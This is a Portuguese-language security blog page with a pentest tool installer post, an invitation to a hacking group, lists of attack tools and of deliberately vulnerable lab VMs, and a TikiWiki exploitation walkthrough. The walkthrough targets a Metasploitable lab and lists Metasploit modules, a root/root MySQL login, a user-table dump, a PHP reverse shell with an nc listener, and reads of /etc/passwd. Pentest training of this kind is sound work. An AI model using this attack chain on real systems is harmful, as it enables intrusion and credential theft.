http://www.oissg.org/issaf
http://ccwapss.blogspot.com/
http://www.penetration-testing.com/
https://www.ee.oulu.fi/research/ouspg/Glossary
http://bluetooth-pentest.narod.ru/
http://www.infosecinstitute.com/blog/2005/10/penetration-testing-methodology-fact.html

sábado, 23 de abril de 2011

Script de instalação de ferramentas de segurança no Ubuntu



infondlinux é um script de configuração pós para o Ubuntu Linux. Ele instala ferramentas de segurança e add-ons do Firefox. Tools instalado pelo script estão listados no início do código-fonte.

# download:
$ wget http://infondlinux.googlecode.com/svn/trunk/infondlinux.sh

# install:

$ sudo infondlinux.sh

Pakages :

# debian packages
# - imagemagick
# - vim
# - less
# - gimp
# - build-essential
# - wipe
# - xchat
# - pidgin
# - vlc
# - nautilus-open-terminal
# - nmap
# - zenmap
# - sun-java6-plugin et jre et jdk
# - bluefish
# - flash-plugin-nonfree
# - aircrack-ng
# - wireshark
# - ruby
# - ascii
# - webhttrack
# - socat
# - nasm
# - w3af
# - subversion
# - wireshark
# - mercurial
# - libopenssl-ruby
# - ruby-gnome2
# - traceroute
# - filezilla
# - gnupg
# - rubygems
# - php5
# - libapache2-mod-php5
# - mysql-server
# - php5-mysql
# - phpmyadmin
# - extract
# - p0f
# - spikeproxy
# - ettercap
# - dsniff :
# * arpspoof - Send out unrequested (and possibly forged) arp replies.
# * dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
# * dsniff - password sniffer for several protocols.
# * filesnarf - saves selected files sniffed from NFS traffic.
# * macof - flood the local network with random MAC addresses.
# * mailsnarf - sniffs mail on the LAN and stores it in mbox format.
# * msgsnarf - record selected messages from different Instant Messengers.
# * sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
# * sshow - SSH traffic analyser.
# * tcpkill - kills specified in-progress TCP connections.
# * tcpnice - slow down specified TCP connections via “active� traffic shaping.
# * urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
# * webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
# * webspy - sends URLs sniffed from a client to your local browser
# - unrar
# - torsocks
# - secure-delete
# - nautilus-gksu
# - sqlmap
# - john the ripper

# third party packages
# - tor
# - tor-geoipdb
# - virtualbox 4.0
# - google-chrome-stable

# manually downloaded softwares and version
# - DirBuster (1.0RC1)
# - truecrypt (7.0a)
# - metasploit framework (3.6)
# - webscarab (latest)
# - burp suite (1.3.03)
# - parosproxy (3.2.13)
# - jmeter (2.4)
# - rips (0.35)
# - origami-pdf (latest)
# - pdfid.py (0.0.11)
# - pdf-parser.pym (0.3.7)
# - fierce (latest)
# - wifite (latest)
# - pyloris (3.2)
# - skipfish (1.86 beta)
# - hydra (6.2)
# - Maltego (3.0)
# - set
# - volatilty (1.3 beta)

# home made scripts
# - hextoasm
# - md5crack.py (written by Corbiero)
# - chartoascii.py
# - asciitochar.py
# - rsa.py

# firefox extensions
# - livehttpheaders
# - firebug
# - tamperdata
# - noscript
# - flashblock
# - flashgot
# - foxyproxy
# - certificatepatrol
# - chickenfoot 1.0.7

Fonte: http://www.thehackernews.com/2011/04/infondlinux-security-tools-install.html

quarta-feira, 13 de abril de 2011

Brasil Underground - Grupo brasileiro de informática hacker

                           Brasil Underground


Convido os leitores do blog a participar de um grupo de discussão sobre informática hacking e afins.
Serão abordados todo tema relacionado a segurança digital:

Teste de intrusão
Defacement
Engenharia reversa
Engenharia social
Cracking
Programação
Phreaker 
Etc...

Ingresse no grupo através desse link:
https://groups.google.com/group/brasil-underground?hl=pt

Para todos que tiverem a  intenção de aprender e compartilhar seus conhecimento, lembrando que o conteúdo e restrito!

Administradores:

Wander Teixeira - http://www.exploit-h.org/
Marcos Pitanga
Clandestine - http://www.clandestine-ethicalforense.blogspot.com/
Kembolle Amilkar - http://www.kembolle.com.br/
Fabiano matias

quarta-feira, 9 de fevereiro de 2011

Kit de ferramentas de segurança (Kit hacker)



Algum tempo atras eu mostrei uma lista de ferramenta para teste de segurança, desse vez resolvi mostrar no geral, as ferramentas mais usadas por hackers de todos os níveis.
Mas vale lembra que "Hackers fazem ferramentas, mas ferramentas não fazem de você um hacker", não fique dependente apenas de ferramentas criadas por outros e procure desenvolver as suas. Ficando depende das mesmas, você nunca vai evoluir e sempre dependente das mesmas.

1° - Ferramenta de intrusão

a) Metasploit framework - http://www.metasploit.com/

b) Canvas-  http://www.immunitysec.com/products-canvas.shtml

c) Core Impact - http://www.coresecurity.com/products/coreimpact/

2° - Scanner de vulnerabilidade

a) Nessus - http://www.nessus.org/

b) Retina - http://www.eeye.com/html/Products/Retina/index.html

c) Sara - http://www-arc.com/sara/

3° - Scanner de vulnerabilidade em website

a) Acunetix - http://www.acunetix.com/

b) Rational appscan - http://www.ibm.com/software/awdtools/appscan/

4° - Ferramentas de Sql injector

a) Sqlihelper

b) Havij

c) SQL Exploiter

5°- Ferramentas para quebrar senha (Password Cracking)

a) John the ripper - http://www.openwall.com/john/

b) THC hydra - http://www.thc.org/thc-hydra/

c) Brutus - http://www.hoobie.net/brutus/

d) L0PhtCrack - http://www.l0phtcrack.com/

e) SAMInside  - http://insidepro.com

f) Cain e abel - http://www.oxid.it/cain.html

g) Pwdump - http://www.foofus.net/fizzgig/pwdump/

6° - Scanner de portas

a) Nmap - http://nmap.org/

b) Angry Ip scanner - http://www.angryziber.com/ipscan/

c) Super Scan - http://www.foundstone.com/us/resources/proddesc/superscan.htm

7° - Detecção de intruso

a) Snort - http://www.snort.org/

b) Sguil - http://sguil.sourceforge.net/

8° - Live CDs

a) Ophcrack - http://ophcrack.sourceforge.net/

b) Hiren’s boot cd - http://www.hiren.info/pages/bootcd

c) Ultimate boot cd - http://www.ultimatebootcd.com/

d) Lista de distros pentest -  http://remote-execution.blogspot.com/2011/01/lista-de-distribuicoes-linux-para-teste.html

9° - Wireless

a) Wireshark - http://www.wireshark.org/

b) Kismet - http://www.kismetwireless.net/

c) Aircrack - http://www.aircrack-ng.org/

d) Netstumbler - http://www.stumbler.net/

10° - Esteganografia

a) Lista de ferramentas gratuitas:
http://sourceforge.net/search/?type_of_search=soft&words=steganography

11° - Ferramentas de rastreamento IP

a) Neo Trace - http://www.networkingfiles.com/neotrace/

b) Visual Trace - http://www.visualiptrace.com

12° - Engenharia reversa

a) Debuggers - OllyDbg,WinDbg

b) Unpackers - QUnpack

c) DisAssemblers - WIN32Dasm

d) Decompilers - Boomerang,Mocha,JAD

e) Hex Editors - Hexworkshop,Hview, HxDSetupEN

Lista das ferramentas: http://www.woodmann.com/crackz/Tools.htm

13° - Ambiente virtual de SO

a) Vmware - http://www.vmware.com/

b) Virtual box - http://www.virtualbox.org/

c) Sandboxie - http://www.sandboxie.com/

d) PC virtual - http://www.microsoft.com/windows/virtual-pc/

Alguma dica ou sugestão, comente abaixo.

terça-feira, 4 de janeiro de 2011

Lista de servidores e aplicativos vulneráveis (Laboratório pentest)


Vou mostrar alguns recursos e distribuições para serem feitos testes de penetração, onde vocês pode usar as técnicas e  ferramentas de exploração em um ambiente totalmente seguro e legal. A maioria das distros são LiveCD e possui inúmeras vulnerabilidades, onde pode ser usadas para ataques de exploração web, enumeração, cracking, forense, engenharia reversa, penetração e etc...
Caso queira sugeri mais alguma distro,  comente ou entre em contato.
Greatz Phillip Bailey

Atualizado em 24/07/2011


WebGoat

WebGoat é uma aplicação web J2EE deliberadamente insegura mantido pela OWASP projetado para ensinar lições de segurança em aplicações web. Em cada aula, os usuários devem demonstrar o seu entendimento de uma questão de segurança, explorando uma vulnerabilidade real na aplicação WebGoat. Por exemplo, em uma das lições que o usuário deve usar a injeção SQL para roubar números de cartão de crédito falso. O aplicativo é um ambiente de ensino realista, proporcionando aos usuários com dicas e códigos para explicar melhor a lição.

http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

UltimateLAMP

UltimateLAMP é uma máquina virtual rodando Ubuntu contendo serviços vulneráveis ​​e contas fracas.

A VM UltimateLAMP executa os seguintes serviços: Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare, Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhphMyAdmin, Webmin,Mutillidae 1.5 (OWASP Top 10 Vulns)

http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip

Holynix

Semelhante ao de-ice Cd’s e pWnOS, holynix é uma imagem vmware do ubuntu server que foi deliberadamente construída para ter falhas de segurança para fins de testes de penetração.Cheio de falhas e de obstáculos, que são encontradas no mundo real.
http://pynstrom.net/holynix.php

WackoPicko

WackoPicko é um site que contém vulnerabilidades conhecidas. Foi usado pela primeira vez para o papel Pentest: Uma Análise da black-bom e Web Vulnerability Scanner.
http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf
https://github.com/adamdoupe/WackoPicko

De-ICE PenTest LiveCDs

Os LiveCDs pentest são a criação de Thomas Wilhelm, que foi transferido para uma equipe de teste de penetração na empresa onde trabalhava. Precisando de aprender muito sobre como os testes de penetração tão rapidamente quanto possível, Thomas começou a olhar para ambos os instrumentos e objectivos. Ele encontrou uma série de ferramentas, mas não metas utilizáveis para praticar contra. Eventualmente, em uma tentativa de reduzir o fosso de aprendizagem, Thomas criou cenários pentest usando LiveCDs.
http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Metasploitable

Metasploitable é um Ubuntu 8.04 instalado em um servidor de 6,5 de uma imagem VMWare. Um número de pacotes vulneráveis são incluídas, incluindo uma instalação de Tomcat 5.5 (com credenciais fraca), distcc, tikiwiki, twiki, e um velho mysql.
http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Owaspbwa

Open Web Application Security Project (OWASP) Broken Aplicações Web Project, uma coleção de aplicativos web vulnerável.
http://code.google.com/p/owaspbwa/

Web Security Dojo

Um open-source independente do ambiente de formação para os testes de penetração da Web Application Security. Tools + Targets = Dojo
Diversas ferramentas de segurança de aplicações web e aplicações web de teste vulneráveis foram adicionados a uma instalação limpa do Ubuntu v10.04.1, que é corrigida com as atualizações adequadas e adições VM para fácil utilização.
http://www.mavensecurity.com/web_security_dojo/

Lampsecurity

Formação AMPSecurity é projetado para possuir uma série de vunerabilidade, criada em uma imagens de máquinas virtuais juntamente com a documentação completa, projetado para ensinar Linux, Apache, php, segurança mysql.
http://sourceforge.net/projects/lampsecurity/files/

Damn Vulnerable Web App (DVWA)

Damn Vulnerable Web App é um PHP/MySQL aplicação web, que é totalmente vulneráveis. Seus principais objetivos são para ajudar os profissionais de segurança para testar suas habilidades e ferramentas em um ambiente legal, ajudar os desenvolvedores web a entender melhor os processos de segurança de aplicações web e ajuda os professores / para ensinar alunos / aprender de segurança de aplicativos web em um ambiente de sala de aula.
http://www.dvwa.co.uk/

Hacking-Lab

Este é o Hacking-Lab projeto LiveCD. Ele está atualmente no estagio beta. O Live-CD é um ambiente de cliente padrão para resolver nossos desafios wargame Hacking-Lab do controle remoto.
http://www.hacking-lab.com/hl_livecd/

Moth

Moth é uma imagem do VMware com um conjunto de aplicativos da Web e vulneráveis scripts, que você pode utilizar para:
1. Testing Web Application Security Scanners
2. Testing Static Code Analysis tools (SCA)
3. Giving an introductory course to Web Application Security
http://www.bonsai-sec.com/en/research/moth.php

Damn Vulnerable Linux (DVL)

Damn Vulnerable Linux é uma distribuição Linux toda ruim. Seus desenvolvedores gastaram horas enchendo-o de vulnerabilidades, mal-configuração, desatualização e software exploráveis que o torna vulnerável a ataques. DVL não é feito para correr em sua área de trabalho - é uma ferramenta de aprendizagem para os estudantes de segurança.
http://www.damnvulnerablelinux.org/

pWnOS

pWnOS está em um "VMImage", que cria uma meta para a prática de testes de penetração, com o "objetivo final" é fazer de raiz. Ele foi projetado para praticar o uso de exploits, com múltiplos pontos de entrada.
http://www.krash.in/bond00/pWnOS%20v1.0.zip

Virtual Hacking Lab

Um mirror deliberadamente de aplicações inseguras e softwares antigos com vulnerabilidades conhecidas. Usado para a prova de conceito / treinamento / segurança afins de aprendizagem. Disponível em imagens virtuais ou iso vivo(liveCD) ou formatos autônomo.
http://sourceforge.net/projects/virtualhacking/files/

BodgeIt Store

A BodgeIt Store é uma aplicação web vulnerável, que é atualmente destinado a pessoas que são novas para pen testing.

http://code.google.com/p/bodgeit/


Badstore

Badstore.net é dedicado a ajudar você a entender como os hackers atacam vulnerabilidades em aplicações Web, e mostrando-lhe como reduzir a sua exposição.
http://www.badstore.net/

Katana

Katana é uma suíte de segurança portátil multi-boot, que reúne muitas das distribuições de hoje, melhor segurança e aplicações portáteis para fugir de um único Flash Drive. Ele inclui as distribuições que focam Pen-Teste, Auditoria, Perícias, recuperação do sistema, análise da rede e remoção de malware. Katana também vem com mais de 100 aplicações portáteis do Windows, tais como Wireshark, Metasploit, NMAP, Cain & Abel, e muitos mais.
http://www.hackfromacave.com/katana.html

Hackademic Challenges

A OWASP Hackademic Desafios, é um projeto open source que pode ser usado para testar e melhorar o conhecimento do sistema de informação e segurança de aplicações web. A OWASP Hackademic tem Desafios implementar em cenários realistas, com vulnerabilidades conhecidas em um ambiente seguro e controlável. Os usuários podem tentar descobrir e explorar essas vulnerabilidades, a fim de aprender conceitos importantes de segurança da informação através da perspectiva do invasor.

http://www.hackademic.eu/

Exploit.co.il Vulnerable Web App

Exploit.co.il Vulnerable Web app concebido como uma plataforma de aprendizagem para testar diferentes técnicas de injeção SQL Este é um site totalmente funcional com um sistema de gerenciamento de conteúdo baseado em fckeditor. Você pode baixá-lo como código fonte ou uma pré-configurado.

http://sourceforge.net/projects/exploitcoilvuln/


Gruyere

Este codelab mostra como vulnerabilidades de aplicativos web podem ser exploradas e como se defender contra esses ataques. A melhor maneira de aprender é fazendo as coisas, então você vai ter a chance de fazer alguns testes de penetração real, na verdade, de exploração de uma aplicação real. Especificamente, você aprenderá o seguinte:
Como uma aplicação pode ser atacado com vulnerabilidades de segurança comum da web, como vulnerabilidades cross-site scripting (XSS) e de falsificação de cross-site pedido (XSRF).
Como encontrar, corrigir e evitar essas vulnerabilidades comuns e outros bichos que têm um impacto de segurança, como a negação de serviço, divulgação de informações ou a execução remota de código.
Para tirar o máximo proveito deste laboratório, você deve ter alguma familiaridade com a forma como funciona uma aplicação web (por exemplo, o conhecimento geral do HTML, templates, cookies, AJAX, etc.)

http://google-gruyere.appspot.com/

Kioptrix

Este Kioptrix VM Imagem são desafios fáceis. O objetivo do jogo é adquirir acesso root via todos os meios possíveis (exceto realmente hackear o servidor VM ou player).
O objetivo destes jogos são para aprender as ferramentas e técnicas básicas de vulnerabilidade, avaliação e exploração. Há maneiras mais de um para completar com sucesso os desafios.

http://www.kioptrix.com/blog/?page_id=135

NETinVM

NETinVM é uma única imagem de máquina virtual VMware que contém, pronto para ser executado, uma série de User-Mode Linux (UML) de máquinas virtuais que, quando iniciado, conformam uma rede de computador inteiro dentro da máquina virtual VMware. Daí NETinVM o nome, um acrônimo para Rede no Virtual Machine. NETinVM foi concebido principalmente como uma ferramenta educacional para ensinar e aprender sobre sistemas operacionais, redes de computadores e segurança do sistema e de rede, mas outros usos são certamente possível.

http://informatica.uv.es/~carlos/docencia/netinvm/

SecuriBench

Stanford SecuriBench é um conjunto de programas da vida real fonte aberto para ser usado como um campo de testes para as ferramentas de segurança dinâmica e estática. Release 0,91 uma foca aplicativos da Web baseados em Java.

Estas aplicações sofrem de uma variedade de vulnerabilidades, incluindo

ataques de injeção SQL
Cross-site scripting ataques
ataques HTTP divisão
ataques Path Traversal

http://suif.stanford.edu/~livshits/securibench/

WebMaven

WebMaven (mais conhecido como Banco Buggy) foi um ambiente de aprendizagem interativa para segurança de aplicações web. É emulado várias falhas de segurança para o usuário a encontrar. Esta usuários habilitados para a prática segura e legal aplicação web técnicas de avaliação de vulnerabilidade. Além disso, os usuários poderiam avaliação comparativa das suas ferramentas de auditoria de segurança para garantir que eles executam como anunciado.

http://www.mavensecurity.com/WebMaven/

domingo, 31 de outubro de 2010

Explorando vulnerabilidade no Tikiwiki

 ______
/ Sinopse \________________________

Vou mostrar nessa vídeo aula um ataque ao serviço Tikiwiki, que é o serviço de gerenciamento de conteúdo através da web.
Primeiramente rodei um postscan (Nmap) em uma determinado host, logo encontrando a porta 80 aberta(Porta de serviço web), testei em um navegador para testa se o serviço realmente estava funcionando, logo apos usei o Dirbuster para listar os diretórios do serviço web. Testei alguns ate encontrar o campo de login.
Com essa informações em mãos, parti para o ataque, mostrei a auditoria com o metasploit e manual, como vocês vão pode observar, podemos obter o mesmo resultado.

 __________________
/ Informações adicionais \___________

O serviço Tikiwiki estava rodando em um sistema operacional Ubuntu 8.04 modificado pela equipe do Metasploit e chamado de Metasploitable.
A equipe do Metasploit procurei colocar o máximo de vulnerabilidades possíveis, e uma ótima distro para teste de penetração.
As vulnerabilidades: http://www.metasploit.com/documents/express/Metasploitable.txt
Baixar o ISO(torrent): http://www.metasploit.com/documents/express/Metasploitable.zip.torrent

 ________
/ Comandos \________________________

nmap 192.168.1.4
java -jar DirBuster-0.12.jar -u http://192.168.1.4
msfconsole
search tikiwiki
use use admin/tikiwiki/tikidblib
set RHOST 192.168.1.4
exploit
tiki-listpages.php?offset=0&sort_mode=
mysql -h 192.168.1.105 -u root -p root
show databases;
use tikiwiki195;
show tables;
select * from users_users;
http://192.168.1.4/tikiwiki/backups/shell-reverso.php
nc -lvp 8080
cat /etc/passwd
search tikiwiki
use exploit/unix/webapp/tikiwiki_graph_formula_exec
show options
show payloads
setg payload generic/shell_bind_tcp
set lhost 192.168.1.5
set rhost 192.168.1.5
show options
exploit
ls
whoami
cat /etc/passwd

 ___________
/ Sobre o Video \____________________

Tamanho: 40.08 Mb
Formato: AVI
Duração: 12:54
Musica: Clint Mansell - Requiem for a Dream
Autor: Fabiano Matias
Baixar: http://www.4shared.com/file/Z6nHD7AX/tikiwiki.html
On line: http://www.vimeo.com/16375616







 _________
/ Referencias \______________________

http://www.backtrack-linux.org/forums/backtrack-videos/
http://blog.metasploit.com/2010/05/introducing-metasploitable.html
http://www.metasploit.com/documents/express/Metasploitable.txt
http://www.metasploit.com/
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
http://nmap.org
http://pt.wikipedia.org/wiki/TikiWiki
http://www.exploit-db.com/exploits/2701/
http://pentestmonkey.net/tools/php-reverse-shell/
http://www.metasploit.com/documents/express/Metasploitable.zip.torrent
http://www.osvdb.org/30172
http://www.securityfocus.com/bid/20858
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5702
http://secunia.com/advisories/22678/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-5423
http://www.osvdb.org/40478
http://www.securityfocus.com/bid/26006

Publicado nos parceiros do Blog:

http://www.darkside-forums.com.br/ipb/topic/446-vulnerabilidade-no-tikiwiki/
http://www.chmod.com.br/vb/showthread.php?10388-Vulnerabili**de-no-TikiWiki
http://www.re-b.net/home/viewtopic.php?f=41&t=325
Forum-underground no momento em manutenção

 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers